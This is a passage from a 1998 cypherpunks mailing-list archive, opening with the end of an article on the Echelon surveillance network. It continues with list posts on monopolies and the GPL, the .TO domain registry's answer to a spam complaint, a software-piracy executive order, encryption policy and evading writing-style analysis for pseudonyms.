 According to the STOA report and stories in The
 New York Times, The Daily Telegraph, and The
 Guardian, Echelon consists of a network of
 listening posts, antenna fields, and radar
 stations. The system is backed by computers
 that use language translation, speech
 recognition, and keyword searching to
 automatically sift through telephone, email, fax,
 and telex traffic. 

 The system is principally operated by the NSA
 and the GCHQ, but reportedly also relies on
 cooperation with "signals intelligence"
 operations in other countries, including the
 Communications Security Establishment of
 Canada, Australia's Defense Signals Directorate,
 and New Zealand's Government
 Communications Security Bureau. 

 John Pike, a security analyst for the Federation
 of American Scientists, said each of the five
 government agencies takes responsibility for its
 own geographical region. 

 Each agency reportedly maintains a glossary of
 keywords. If Echelon intercepts a transmission
 containing a word or phrase contained in the
 glossary -- bomb, for example -- the full
 conversation, email, or fax is recorded and
 shared among the agencies. 

 "Echelon intercepts Internet traffic at the
 transport layer, such as the TCP/IP layer, so the
 system doesn't care too much what it is or
 where it came from," said Pike. "For analog
 traffic, such as telephone conversations, it uses
 automatic voice-recognition technology to scan
 the conversations." 

 Abuses of Power? 

 While the EU is aware that Echelon may be a
 useful tool for tracking down global terrorists,
 drug barons, and international criminals, Ford
 said the parliament is concerned that the
 system may also be used for espionage, spying
 on peaceful nations, or gaining unfair economic
 advantage over non-member nations. 

 Indeed, there are many reported instances of the
 British and US intelligence agencies working
 together to gather information in a questionable
 manner. 

 A 1993 BBC documentary about NSA's Menwith
 Hill facility in England revealed that peace
 protestors had broken into the installation and
 stolen part of this glossary, known as "the
 Dictionary." The documentary alleged that
 Menwith Hill -- a sprawling installation covering
 560 acres and employing more than 1,200
 people -- was Echelon's nerve center. 

 Further evidence emerged last year, when
 British Telecom told a court that it provides
 high-bandwidth telecommunications into the
 Menwith Hill facility and from the facility to the
 United States, using a transatlantic fiber-optic
 network. 

 "I believe that these five intelligence agencies
 are working from a single plan," said Pike. 

 British investigative journalist Duncan Campbell
 was the first to report about Echelon in a 1988
 article in The New Statesman. He believes that
 there is a very thin line between intelligence
 gathering and commercial espionage. 

 Pike, of the Federation of American Scientists,
 believes the intelligence agencies operate in a
 gray area of international law. For example,
 there is no law prohibiting the NSA from
 intercepting telecommunications and data traffic
 in the United Kingdom and no law prohibiting
 GCHQ from doing the same thing in the United
 States. 

 "The view by the NSA seems to be anything that
 can be intercepted is fair game," said Pike. "And
 it's very hard to find out what, if any, restraints
 can be employed." 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 1 Oct 1998 17:34:12 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810012235.RAA21520@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Thu, 1 Oct 1998 15:15:18 -0700 

> Show me an example of an unregulated coercive monopoly whose source of
> monopoly power is not ultimately the government.

The Mafia. The handful of world-class coke dealers. Your local church.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 3 Oct 1998 13:03:04 +0800
To: Sunder <sunder@brainlink.com>
Subject: Re: NT5 Ships 96 years early!!!
In-Reply-To: <361533DE.7B4DA16C@brainlink.com>
Message-ID: <Pine.BSF.3.91.981001173829.7910B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




I am dyslexic of Micro$oft. Prepare to have your ass laminated.

On Fri, 2 Oct 1998, Sunder wrote:

> Date: Fri, 2 Oct 1998 16:14:15 -0400
> From: Salvatore Denaro <sal@panix.com>
> Subject: NT5 Ships 96 years early
> 
> >From the MS timeline:
> 
> http://www.microsoft.com/WindowsNT5/workstation/default.asp
> 
> WINDOWS NT SERVER 5.0
> DECEMBER 30, 1899 -- Find out about Windows NT Server 5.0 and how it builds 
> upon the strengths of version 4.0 to provide a platform that is faster, 
> more reliable, and easier to manage.
> 
> --
> Salvatore Denaro
> sal@panix.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Thu, 1 Oct 1998 17:03:31 +0800
To: "Robert Hettinga" <cypherpunks@cyberpass.net>
Subject: Re: EduFUD: Computers, software can harm emotional, social development
Message-ID: <199810012200.SAA19389@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 10/1/98 2:50 PM, Robert Hettinga (rah@shipwright.com)  passed this 
wisdom:

>I guess I know too many stone geniuses who've had computers since they were
>children -- most of the people on this list were raised that way, I would
>bet -- to take this crap too seriously, reduced attention "spans" or not.
>
>By the way, "span" is the wrong word for ADD. I was hardly raised on TV,
>much less computers, (I had my face in science fiction books throughout
>most of my childhood), and I've been known to focus on something
>"inappropriately" for hours.

 Ever since I discovered my ADHD some two or three years after I started 
working with ADHD kids in the our school district a lot of things began 
to make sense.  But I came to realize and now make it a point to tell 
these kids that taken as a whole ADD/ADHD is a blessing more so than a 
curse. The ability to hyper-focus on a task at hand gives you the power 
to do in a few hours sometimes things it would take others a day or more 
to do. For the truly ADD kid (as opposed to the culturally induced 
variety) the hell he has gone through and the incredible low self-esteen 
they generally have, just hearing that is often enough to make a radical 
turn-around for them.

>While I certainly have varying degrees of control of my attention, but I
>just don't see that a "handicap" anymore. My attention is event-driven,
>rather than processed in neat organized batches, and I've learned to like
>it that way, even if it did give me trouble when I was chained in the
>aforementioned tower's dungeon for most of my formative years.
>
>Besides, even if computers cause people to have event-driven attention
>rather than in nice neat industrial batches, that's probably a Good
>Thing(tm). Consider it evolution in action.
>
>Farmers and mechanics may need "control" of their attention, but in an
>information "hunter" like myself, most of the people who do anything useful
>on the net, it's a selective disadvantage.

   ... amen!!!


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "The 2nd amendment guarantees all the rest."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 1 Oct 1998 20:03:52 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284725@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
> > Show me an example of an unregulated coercive monopoly 
> > whose source of monopoly power is not ultimately the 
> > government.

Jim Choate answered:
> The Mafia. The handful of world-class coke dealers. Your local church.

The church had a monopoly on religion. Not any more. When it had it was
supported by the state or by its own use of force. The other two
organizations use force to maintain their monopoly, and again both are
supported indirectly (sometimes more directly than we like to think) by
the state. The state prohibits free competition, it is a black market.

When I talk of a free market I man Laissez Faire Capitalism, not
Anarcho-Capitalism. The abolition of force is a requisite (and the only
proper role of government). A large company can maintain a monopoly by
force (more often than not the government is the instrument of force,
the legalization of coercive monopoly power).

	Matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 18:50:40 +0800
To: "Vladimir Z. Nuri" <rah@shipwright.com>
Subject: Re: EduFUD: Computers, software can harm emotional, socialdevelopment
In-Reply-To: <v04011741b239749c38d9@[139.167.130.248]>
Message-ID: <v04011701b239c255962a@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:07 PM -0500 10/1/98, Vladimir Z. Nuri wrote:

>the whole image of parents limiting how much their children
>can surf the net is quite amusing to me. it's like trying
>to push a river.

	Would you say the same thing about television?

	As much of a fan of Computers, reading, and education as I am, I
also think kids need "peer interaction", and "physical exercise", as
strange as those things may sound to people.

	Yes, our current school system is based on the "Factory" workflow,
show up at x time, take your place on the production line, plug square
holes on top of round pegs for 7.5 hours, and then go home. On the
otherhand sticking children in Veal Pens for 6 hours a day isn't the answer.

	Our children don't need computers nearly as much as they need
teachers who can speak and write properly. Good typing skills are no
substitue for a good brain. Our children don't need computers nearly as
much as they need teachers who can explain algebra and geometery. I don't
care how well you can program your HP-48, you have to know WHICH, WHEN, and
WHY to use certain formulas.

	Wiring the schools to the internet is not about education, it's
about control and lazy teachers.

	Finding information is easy, processing it--sorting, labeling,
priortizing & etc--are what the schools should be teaching.

>oh, the terror! kids might even get bored with our cultures 2 great
>opiates: sports and entertainment.  who knows what will
>happen then?  tyranny is held in place by frivolous and
>meaningless pastimes and amusements in our world.

	It seems that more and more "kids" are giving themselves over to
those two opiates.

>fortunately, PCs and the internet are now an unstoppable
>force. we will see soon what happens when it meets many

	Y2K just might stop it dead in it's tracks.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 18:17:38 +0800
To: Petro <cypherpunks@cyberpass.net
Subject: Re: EduFUD: Computers, software can harm emotional, social development
In-Reply-To: <v04011741b239749c38d9@[139.167.130.248]>
Message-ID: <v0401174cb239b772ef6e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:13 PM -0400 on 10/1/98, Petro wrote:


> At 1:50 PM -0500 10/1/98, Robert Hettinga wrote:
>
> 	If you (and others) are going to forward this kind of stuff, could
> you least foucs long enough to make sure it is properly formatted?
>
> 	It's a touch difficult to read.

Actually, that was the point.

It came to me that way. Most of these educrats don't know how to use their
email yet. :-).

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 18:18:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is the .to (Tonga) domain completely rogue and should beremoved?
Message-ID: <v04011750b239ba5e9f37@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 1 Oct 1998 15:57:48 -0400
Reply-To: egullich@tonic.to
Originator: com-priv@lists.psi.com
Sender: com-priv@lists.psi.com
Precedence: bulk
From: egullich@tonic.to (Eric Gullichsen)
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Re: Is the .to (Tonga) domain completely rogue and should be removed?
X-Comment:  Commercialization and Privatization of the Internet


This is an official reply to Barry Shein <bzs@world.std.com>
who recently cross-posted to inet-access@earth.com, nanog@merit.edu,
domain-policy@lists.internic.net, and com-priv@psi.com under the
Subject heading: Is the .to (Tonga) domain completely rogue and should
be removed?

As TLD admin for the .TO ccTLD, I thought Mr. Shein's posting
deserved a reply.

---------------------------------------------------------------------


Mr. Shein:

I am the hostmaster and Administrative, Technical and Zone Contact
at Tonic, the top level domain name registration authority for the
.TO country code (http://rs.internic.net/cgi-bin/whois?to5-dom).

Since June 1997, our automated domain name registry at http://www.tonic.to
has been facilitating the registration of .TO names as a service
to the global Internet community. Neither Tonic nor IANA policy requires the
registered owner of a .TO name to be physically situated in the Kingdom
of Tonga.

>We've been having increasing problems with one or more porn sites in the
>.to domain promoting itself by massive spamming of
>AOL customers using one of our domains in their From: header thus causing
>both complaints to us and thousands of bounces
>from AOL due to bad AOL addresses in their spam lists.

We are sorry to hear that you have been having problem with SPAM
involving a .TO domain, and wish to draw your attention to the fact
that .TO is the *only* top level domain we know of with an explicit antispam
policy. We at Tonic feel strongly about spam, and believe it to be theft
of service, and a very bad thing for the net in general.

It is our policy to terminate the registration of a domain name
involved in spam, after warning the domain name holder to cease
unsolicited bulk mailings that involve a .TO name.

>From our FAQ (at http://www.tonic.to/faq.htm):

   Q: I'm a spammer. Is a .TO domain something I should use?

   Tonic feels very strongly that the sending of unsolicited bulk email
   ("spamming") constitutes theft of service, and we do not condone the
   use of .TO domain names for this purpose.

   If we receive complaints that a .TO domain name has been used for
   this purpose, we will advise the domain owner of the complaint and
   request that they desist from this activity. Tonic reserves the right
   to remove any .TO name registration if a name is used as a source of spam,
   or an address to which to reply to such bulk mail solicitations.

We have had to delete a number of .TO domains for egregious SPAM and will
continue to do so in the cases where a stern warning fails to solve
the problem. Please send a copy of any SPAM involving a .TO domain name
to:  hostmaster@tonic.to and we will warn the spammer and/or terminate
the domain name registration.

>Looking at the .to domain I can't help but notice it's heavily laden with
>what appear to be porn sites (sexonline.to, come.to,
>xxxhardcore.to, etc.)

The .COM domain is no less "heavily laden" with porn sites.
You will note that sexonline.com and xxxhardcore.com are names registered
with the InterNIC.  The come.to site is a free web redirection site
supporting more than 100,000 customers.  Furthermore, Tonic is a domain
name registry, not a content censor.

>In support of this assertion I want to show you an SMTP conversation with
>what claims to be the Consulate of the
>Government of Tonga in San Francisco (This San Francisco office is listed
>as an official Tongan contact point for visas etc by
>the US State Dept):
>
>world% telnet sfconsulate.gov.to 25
>
>Trying 209.24.51.169...
>Connected to sfconsulate.gov.to.
>Escape character is '^]'.
>220 colo.to SMTP ready, Who are you gonna pretend to be today? VRFY
postmaster
>500 Bloody Amateur! Proper forging of mail requires recognizable SMTP
>commands!

The primary nameserver for .TO is physically located at the Consulate of
Tonga in San Francisco. On all our machines, we run the Obtuse smtpd/smtpfwdd
SMTP store and forward proxy (http://www.obtuse.com/smtpd.html) to
secure our port 25 and thereby prevent 3rd party mail relaying.

Your reasoning as to why its responses to incorrect SMTP
commands constitutes evidence that the .TO domain is "negligent",
"mismanaged" and "an attractive resource for criminal activities"
is ironically incorrect. In fact, having an *unsecured* port 25 open to mail
relaying would be negligent.

Best regards,

- Eric Gullichsen
  Tonic Corporation
  Kingdom of Tonga Network Information Center
  http://www.tonic.to
  Email: egullich@tonic.to

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 18:20:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: New ExecOrd: Computer Software Piracy
Message-ID: <v04011752b239bc9624b1@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Thu, 01 Oct 1998 15:50:05 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: New ExecOrd: Computer Software Piracy
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/1001-125.txt

Clinton Issues Executive Order on Computer Software Piracy
U.S. Newswire
1 Oct 14:10

 Clinton Issues Executive Order on Computer Software Piracy
 To: National Desk, Technology Writer
 Contact: White House Press Office, 202-456-2100

   WASHINGTON, Oct. 1 /U.S. Newswire/ -- The following was released
today by the White House:

                       EXECUTIVE ORDER
                        - - - - - - -
                   COMPUTER SOFTWARE PIRACY

     The United States Government is the world's largest purchaser of
computer-related services and equipment, purchasing more than $20
billion annually.  At a time when a critical component in discussions
with our international trading partners concerns their efforts to
combat piracy of computer software and other intellectual property,
it is incumbent on the United States to ensure that its own practices
as a purchaser and user of computer software are beyond reproach.
Accordingly, by the authority vested in me as President by the
Constitution and the laws of the United States of America, it is
hereby ordered as follows:

     Section 1.  Policy.  It shall be the policy of the United States
Government that each executive agency shall work diligently to
prevent and combat computer software piracy in order to give effect
to copyrights associated with computer software by observing the
relevant provisions of international agreements in effect in the
United States, including applicable provisions of the World Trade
Organization Agreement on Trade-Related Aspects of Intellectual
Property Rights, the Berne Convention for the Protection of Literary
and Artistic Works, and relevant provisions of Federal law, including
the Copyright Act.

     (a) Each agency shall adopt procedures to ensure that the agency
does not acquire, reproduce, distribute, or transmit computer
software in violation of applicable copyright laws.

     (b) Each agency shall establish procedures to ensure that the
agency has present on its computers and uses only computer software
not in violation of applicable copyright laws.  These procedures may
include:

     (1) preparing agency inventories of the software present on its
computers;

     (2) determining what computer software the agency has the
authorization to use; and

     (3) developing and maintaining adequate recordkeeping systems.

     (c) Contractors and recipients of Federal financial assistance,
including recipients of grants and loan guarantee assistance, should
have appropriate systems and controls in place to ensure that Federal
funds are not used to acquire, operate, or maintain computer software
in violation of applicable copyright laws.  If agencies become aware
that contractors or recipients are using Federal funds to acquire,
operate, or maintain computer software in violation of copyright laws
and determine that such actions of the contractors or recipients may
affect the integrity of the agency's contracting and Federal
financial assistance processes, agencies shall take such measures,
including the use of certifications or written assurances, as the
agency head deems appropriate and consistent with the requirements of
law.

     (d) Executive agencies shall cooperate fully in implementing
this order and shall share information as appro-priate that may be
useful in combating the use of computer software in violation of
applicable copyright laws.

     Sec. 2.  Responsibilities of Agency Heads.  In connection with
the acquisition and use of computer software, the head of each
executive agency shall:

     (a) ensure agency compliance with copyright laws protecting
computer software and with the provisions of this order to ensure
that only authorized computer software is acquired for and used on
the agency's computers;

     (b) utilize performance measures as recommended by the Chief
Information Officers Council pursuant to section 3 of this order to
assess the agency's compliance with this order;

     (c) educate appropriate agency personnel regarding copyrights
protecting computer software and the policies and procedures adopted
by the agency to honor them; and

     (d) ensure that the policies, procedures, and practices of the
agency related to copyrights protecting computer software are
adequate and fully implement the policies set forth in this order.

     Sec. 3.  Chief Information Officers Council.  The Chief
Information Officers Council ("Council") established by section 3 of
Executive Order No. 13011 of July 16, 1996, shall be the principal
interagency forum to improve executive agency practices regarding the
acquisition and use of computer software, and monitoring and
combating the use of unauthorized computer software.  The Council
shall provide advice and make recommendations to executive agencies
and to the Office of Management and Budget regarding appropriate
government-wide measures to carry out this order. The Council shall
issue its initial recommendations within 6 months of the date of this
order.

     Sec. 4.  Office of Management and Budget.  The Director of the
Office of Management and Budget, in carrying out responsibilities
under the Clinger-Cohen Act, shall utilize appropriate oversight
mechanisms to foster agency compliance with the policies set forth in
this order.  In carrying out these responsibilities, the Director
shall consider any recommendations made by the Council under section
3 of this order regarding practices and policies to be instituted on
a government-wide basis to carry out this order.

     Sec. 5.  Definition.  "Executive agency" and "agency" have the
meaning given to that term in section 4(1) of the Office of Federal
Procurement Policy Act (41 U.S.C. 403(1)).

     Sec. 6.  National Security.  In the interest of national
security, nothing in this order shall be construed to require the
disclosure of intelligence sources or methods or to otherwise impair
the authority of those agencies listed at 50 U.S. 401a(4) to carry
out intelligence activities.

     Sec. 7.  Law Enforcement Activities.  Nothing in this order
shall be construed to require the disclosure of law enforcement
investigative sources or methods or to prohibit or otherwise impair
any lawful investigative or protective activity undertaken for or by
any officer, agent, or employee of the United States or any person
acting pursuant to a contract or other agreement with such entities.

     Sec. 8.  Scope.  Nothing in this order shall be construed to
limit or otherwise affect the interpretation, application, or
operation of 28 U.S.C. 1498.

     Sec. 9.  Judicial Review.  This Executive order is intended only
to improve the internal management of the executive branch and does
not create any right or benefit, substantive or procedural, at law or
equity by a party against the United States, its agencies or
instrumentalities, its officers or employees, or any other person.

                       WILLIAM J. CLINTON

  THE WHITE HOUSE,
      September 30, 1998.

 -0-
 /U.S. Newswire  202-347-2770/
 10/01 14:10

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 1 Oct 1998 19:18:00 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD (fwd)
Message-ID: <199810020019.TAA22375@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD
> Date: Thu, 01 Oct 98 16:50:32 -0700
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

>                     "Our Founding Fathers intended to create a system with
> division of
>                     power between three branches of government and between
> the state and
>                     federal governments in order to protect our rights.

Three branches of government? Between the state and federal?

I don't think so...

There are *THREE* (3) EQUALY powered members in the government of the United
States of America; federal, state, and the people.

The federal level is split into three seperate branches, they as single
entitities are NOT the federal government.

 ---------------------------------------------------------------------------

We, the People of the United States, in order to form a more perfect Union, 
establish Justice, insure domestic Tranquility, provide for the common 
defence, promote the general Welfare, and secure the Blessings of Liberty to 
ourselves and our Posterity do ordain and establish this Constitution for the 
United States of America. 
 
	This Constitution, and the Laws of the United States which shall 
be made in Pursuance thereof; and all Treaties made, or which shall be made, 
under the Authority of the United States, shall be the supreme Law of the 
Land; and the Judges in every State shall be bound thereby, any Thing in the 
Constitution or Laws of any State to the Contrary notwithstanding.
 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 1 Oct 1998 14:23:20 +0800
To: tcmay@got.net
Subject: Re: Toto -- mimic function or the real thing (Re: no subject)
In-Reply-To: <v03130301b2360de8fbd5@[209.133.20.17]>
Message-ID: <199810011912.UAA08256@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May writes:
> At 5:09 PM -0700 9/28/98, Adam Back wrote:
> >Dunno, but that sure looks like authentic Toto doesn't it (and the
> >rest of the long post of which excerpt quoted above).  [...] or is
> >rather good at imitating his writing style manually
> 
> Crap. I detected this as ersatz Toto after a couple of paragraphs.
> Metaphors were too strained, or something. It just seemed fake.

It wasn't perfect Toto, but it's the best one we've seen yet, I think.

Writing style appears to be hard to mimic, or at least I find it hard.
Toto I think is harder to mimic than most, his style is very
distinctive, but somehow still hard to mimic.

We have seen high quality John Young mimics, which would pass as the
real thing.  But there seems to be something harder about Toto's
style.

I had a go at mimicing Toto for posting to the list (anonymously), but
the output was so obviously not Toto that I scrapped it and deleted
it.

And this is just manual writing style analysis.  NSA letter triple
based analysis, one presumes would be much better.

btw. I suspected a couple of the anonymous replies to one of the
spammers / AOLers looked a bit like Tim May writing style.  (The one
with lots of ! in them -- perhaps it is that Klaus von Future prime!
likes exclamation marks).

I have been thinking about this problem on and off, as it is a problem
for nyms (especially where the true name has been rather vocal already
to provide lots of samples) and I invite comments on the merits of the
following as an approach to reducing leakage of writing style:

Create a multiple choice sentence constructor (say CGI web page with
pull down menus for subject, verb, adjective etc).  Plus text boxes
for less common nouns, names etc.

Apparently during the war soldiers were handed post cards where one
could tick a few boxes ("[ ] I am doing ok / [ ] I blah") for some
reason.

Seems the formally restricted choice of adjectives etc would be less
expresive but perhaps go some reasonable way to frustrate writing
analysis.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Oct 1998 19:34:18 +0800
To: cypherpunks@toad.com
Subject: DTRA, Terrorism, Digital Daily
Message-ID: <199810020026.UAA06931@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



DoD rolled out today the new Defense Threat Reduction
Agency which combines several agencies -- Defense
Special Weapons Agency, Defense Technology Security 
Administration, On-Site Inspection Agency and others --
into a new organization whose principle purpose will be
to control the spread of technologies of mass destruction.

See remarks made at the opening ceremony by Hamre 
and others:

   http://jya.com/dtra100198.htm

And the new, informative DTRA Web site:

   http://www.dtra.mil

The briefing remarks are of interest for what they disclose
about military planning for combating domestic terrorism 
(parallel to what the FBI said about it yesterday), promises 
to speed export licensing and a passing reference by Hamre 
to "a recent ten month process of encryption policy review."
Which may refer to the recent administration policy 
announcement or maybe another in the works.

With the build-up of domestic terrorism fighting forces --
all the mil and gov agencies -- and noises about legislation
being developed for more, it's worth pondering what is
coming with a crackdown on domestic use of encryption.

The Canadian duplicitous announcement today may offer
a clue to what's being secretly agreed upon internationallly: 
state there will be no domestic controls (to assure privacy
and secure commerce) coupled with promises to ease export 
limits (to assure commercial producers), then contradict that
with a statement about new legislation to criminalize
encryption use in the name of "public safety" and provision
for access to encrypted data (to assure national security and 
law enforcement).

Tell all parties what they want to hear in public, then arrange
for what's really going to happen in secrecy among those
responsible parties who know how to bear the terrible burden
of keeping society safe and sound.

Which brings up Time's new "Digital Daily" replacement for
Netley News. News seems to have been eliminated in
favor of entertaining fluff and product promo, even worse
than "mainstream" Time itself. What's up Declan? Has the 
ghost of Luce come back to order Time online to shut up 
reporting unpleasant nefaria and get on with narcotizing 
the masses via Luce's incomparable coy language of
insider duplicity? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 1 Oct 1998 20:19:30 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810020122.UAA22791@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Thu, 1 Oct 1998 18:01:23 -0700 

> I wrote:
> > > Show me an example of an unregulated coercive monopoly 
> > > whose source of monopoly power is not ultimately the 
> > > government.
> 
> Jim Choate answered:
> > The Mafia. The handful of world-class coke dealers. Your local church.
> 
> The church had a monopoly on religion.

Churches monopolize faith (but let's not go there).

> Not any more.

Tell that to the Isreali's and the Arab's, the Serbs and the Slav's, The
Hutu's and the whoever they are I can't think of at the moment, the Irish
Protestants and Catholics, etc., etc., ad nausium...

 When it had it was
> supported by the state or by its own use of force. The other two

force is one form of coercion, faith can be another.

> organizations use force to maintain their monopoly, and again both are
> supported indirectly (sometimes more directly than we like to think) by
> the state. The state prohibits free competition, it is a black market.

A free-market is defined as consisting of the supplier and the consumer
without a regulatory body. It doesn't prohibit a third group *wanting* to
regulate that market. Or of either the producer or consumer using violence
to prevent it.

> When I talk of a free market I man Laissez Faire Capitalism, not
> Anarcho-Capitalism.

What's the specific difference? What is the fundamental litmus test between
a Laisez Faire and a Anarcho? In one case there is no recognized arch to be
had to regulate the market and in the other the third party simply opts out
of participating. In what way are the resulting markets different from
either the producers or consumers view?

> The abolition of force is a requisite (and the only
> proper role of government).

Explain further what you mean by abolition of force is a prerequisite
please.

And what specificaly do you mean by proper role of government?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 1 Oct 1998 20:49:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: [Fwd: Fw: Court Strikes Down Federal Mandates Again]
Message-ID: <199810020151.UAA22894@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> While I have not found this case decision posted anywhere but in this
> usenet posting, I have found some background info:
> http://www.rcfp.org/NMU/961216b.html

> Local Sovereignty Update
> US Court Again Upholds State Sovereignty and Strikes Down Federal =
> Mandate
> This month we have another case in which the federal courts have =
> recognized that the federal government has no authority to impose any =
> mandate on state or local government.
> Printz v. US ruled that  '[t]he Federal Government may neither issue =
> directives requiring the States to address particular problems, nor =
